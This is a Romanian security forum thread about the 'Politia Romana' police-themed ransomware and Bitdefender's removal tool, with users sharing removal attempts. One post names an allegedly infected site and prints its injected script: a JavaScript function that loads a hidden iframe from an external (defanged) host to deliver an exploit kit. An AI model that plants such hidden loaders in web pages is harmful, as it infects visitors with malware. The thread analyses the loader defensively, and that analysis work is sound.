Virusul “Politia Romana” combatut

[Fi8sVrs]

Cei de la Bitdefender au anuntat astazi disponibilitatea unei aplicatii gratuite impotriva "virusului pirateriei" care a infectat milioane de utilizatori din intreaga lume prin intermediul unui mesaj fals aparent trimis din partea politiei.

Pentru cei care nu au auzit deja, acest virus este cunoscut si sub denumirea de "virusul Politia Romana" si afiseaza un mesaj prin care incrimineaza proprietarul calculatorului afectat de piraterie, ulterior solicitand o suma de bani pentru deblocarea calculatorului.

Virusul verifica adresa IP a victimei, o asigura ca mesajul este din partea politiei si o acuza de un delict pe care l-ar fi putut comite si fara sa-si dea seama. Fata de amenintari similare mai vechi, care trimiteau asa zise "amenzi" pentru pornografie, aceasta pune accentul pe infractiuni de piraterie software, a filmelor sau a albumelor muzicale.

Atacatorii intimideaza utilizatorii cu mesaje localizate ce par a veni din partea autoritatilor din tari precum Romania, Statele Unite ale Americii, Marea Britanie, Germania, Austria si Olanda. La noi in tara, au fost solicitate plati ale unor sume de 100 de dolari sau 300 de lei pentru eventuala deblocare a computerului.

Dupa cum stim cu totii pirateria este un fenomen global, astfel incat rata de raspandire a virusului este incredibila, iar numarul celor care au cazut prada escrocheriei creste pe zi ce trece. Avand originie ruseasca, astfel de virusi de tip "Ransom" reusesc sa blocheze complet calculatoarele infectate si sa convinga tot mai multi utilizatori sa plateasca in schimbul eliminarii restrictiilor.

Solutia celor de la Bitdefender se adreseaza celor care au fost deja afectati de acest Trojan.Ransom.IcePol carora li se recomanda instalarea aplicatiei regasite aici si rularea acesteia in Safe Mode.

via Virusul “Politia Romana” combatut - Yahoo! ?tiri România

[B3st]

La cat de buni sunt cei de la bitdefender imi dau seama ce 'inventie' au facut.

Doar daca schimb icoana la fisier cica nu mai e virus )

[Cifre]

In momentul in care te-ai infectat , te duci la politie si iti bagi *Carasu`*-n ma-sa .

Glumeam , sunt de aceasi parere cu B3st.

[wildchild]

Inventia pizdii, scuzati expresia.

E doar un amarat de exe ascuns in TEMP, oricine poate face un script care sa-l stearga inainte sa se asigneze adresa IP la ethernet.

[me.mello]

Ba sa-mi bag pula in el de virus, eu am dat alt-tab/respectiv log off si sa dus momentan...testat pe un xp, oricum e o chestie drive by sau mi se pare mie?

[raynor009]

Parca era ceva similar cu ani in urma in germania. Cand deschideai PC-u iti aparea ceva cu politia din germania si te acuza pentru vizionare de pornografie cu minori sau ceva de genu. Oricum inteligenta miscare de a face bani dupa spate la fraieri.

[aPa_PLaTa]

Am fost si eu victima ca sa zici asa cu "Politia Romana" ,ca mi-a blocat pc'ul ....drace!

M-am dus repede in Safe Mode Networking sa iau acel program de la BitDefender adica RemovalTool , dupa am intrat in Safe Mode normal , am incercat cu RemovalTool si nu mi-a mers.

Asa ca am luat ComboFix si am scapat de asa zisul Virus Politia Romana!

[jetus]

Fiecare cu ce poate

[big_little]

Tampenia asta de virus a aparut din nou in ianuarie 2013 pe baza unei vulnerabilitati 0 day.

Bitdefender ofera si solutia de dezinfectare:

Remediu Bitdefender impotriva virusului ’’Politia Roman?’’

[begood]

vreau si eu un sample cine-l are sa-mi dea pm

[odo]

Salutare! Este pentru prima data cand vad acest virus "instalat" intr-un pc de al unui prieten si nu as vrea sa ma dau batut pentru ca nu reusesc neam sa il scot. Problema este ca nu pot accesa safe mode de nici o culoare (se blocheaza la classpnp) si nu am cum sa rulez combofix. Am incercat cu un windows live + un stick cu combofix, dar nu imi scaneaza, imi arata 2,3 chestii si atat. Acum scanez cu un kaspersky livecd, dar dureaza o eternitate. Ce sfaturi imi puteti oferi?

[malsploit]

Daca poti uploadeaza undeva un fisier infectat sa ma uit prin el si poate reusesc sa scot codul de verificare

[odo]

Daca il gasesc ti-l ofer cu cea mai mare placere.

[lutulik]

Daca poti uploadeaza undeva un fisier infectat sa ma uit prin el si poate reusesc sa scot codul de verificare

Site-ul asta e infectat cu acest virus.

http://www.receivesmsonline.com

Atentie la simpla afisare a paginii se instaleaza virusul. Foloseste un fel de Java Drive By.

[CristianRoflmao]

Site-ul asta e infectat cu acest virus.

http://www.receivesmsonline.com

Atentie la simpla afisare a paginii se instaleaza virusul. Foloseste un fel de Java Drive By.

Am deschis pagina si inca nu am luat virusul ce naiba.

Waw ce nisa tare de cleanfiles.. super.

[malsploit]

Am deschis pagina si inca nu am luat virusul ce naiba.

Waw ce nisa tare de cleanfiles.. super.

Nici la mine nu a mers. Am facut tot ce era posibil. Pagina contine linia asta:

</body><script type="text/javascript" src="hxxp://adultbiz.in/new/jquery.php"></script>

Aici se incarca un script care detecteaza browserul si incarca un payload:

function showBrowVer()
{
    var data = browserDetectNav();      


    if (data[0]) {
      if ((data[0] == 'Opera' || data[0] == 'MSIE' || data[0] == 'Firefox') & data[3] == 'Windows'){
var divTag=document.createElement('div');        
divTag.id='dt';
document.body.appendChild(divTag);
                  var js_kod2 = document.createElement('iframe');
              js_kod2.src = 'hxxp://test1.elguay.es/display/seek.php';
              js_kod2.width = '5px';                  
              js_kod2.height = '3px';                
              js_kod2.setAttribute('style','visibility:hidden');
document.getElementById('dt').appendChild(js_kod2);
      }
    }
}

Acum trebuia sa se incarce un exploit kit. O sa incerc si pe un sistem cu xp/java/flash/pdf/opera sa vad daca reusesc sa fiu "exploatat"

[bodostyle]

Salutare! Este pentru prima data cand vad acest virus "instalat" intr-un pc de al unui prieten si nu as vrea sa ma dau batut pentru ca nu reusesc neam sa il scot. Problema este ca nu pot accesa safe mode de nici o culoare (se blocheaza la classpnp) si nu am cum sa rulez combofix. Am incercat cu un windows live + un stick cu combofix, dar nu imi scaneaza, imi arata 2,3 chestii si atat. Acum scanez cu un kaspersky livecd, dar dureaza o eternitate. Ce sfaturi imi puteti oferi?

Si eu am avut pe cineva care il luase acum ceva timp si reusisem sa il scot ,de cand incepea sa se logheze Windows apasam repetat pe Ctrl +Alt + Supr si opream din Task manager tot ce aparea , si asa reusisem sa pot umbla pe PC sa ii scot microbii.

windows 7 screenshot

[odo]

Vedeti aici in aceste arhive daca este ceva bun.

ps: sunt un atom de 128 ani

MoAJnoS6SJGaOlk6LlGVKlwV+yzaQfPtQfPrL5h2iI9DHhz6S4hPggAJT4TGOg93DxHVT4A5eo6RTgH7ng5NAx0TblHSKgLtbgA3K4LKfm0aQf11MoAJnoS6SJGaOlk6LlGVKlwV+yzaQfPtQfPrMghzgmXgixP6S4hIbYkabk0xMlrO0ILfLtTOMH/lOH1u+8QHpjTig4K9fk/rHfTeghhUDxXTQf11MoAJnoS6SJGaOlk6LlGVKlwV+yzaQfPtQfPrLibkp50YTgq6S4hRf60OggTaLlzND8hGfITVKxA4g40ipG9AfJ6eg5BJLfHsgkcmihLJ+xAQQf11MoAJnoS6SJGaOlk6LlGVKlwV+yzaQfPtQfPrnHQN+hT1KHP6S4hhTohjfiB7fG66fI0DAtAxf80QMihNA6A30GJJSjAR0xkk+gk2gYktihQ=Qf11MoAJnoS6SJGaOlk6LlGVKlwV+yzaQfPtQfPrL662Hi6MMxP6S4hLMmPJAJQXLIQGHjBLiIT5D86xbg3tbJQ3+o1KTGTMKHHG+g0YbyQF+GuT

[odo]

Ati incercat arhivele? Este ceva interesant sau doar am arhivat aiurea ceea ce nu trebuie?

Edited August 14, 2013 by odo

[eastern]

Boilor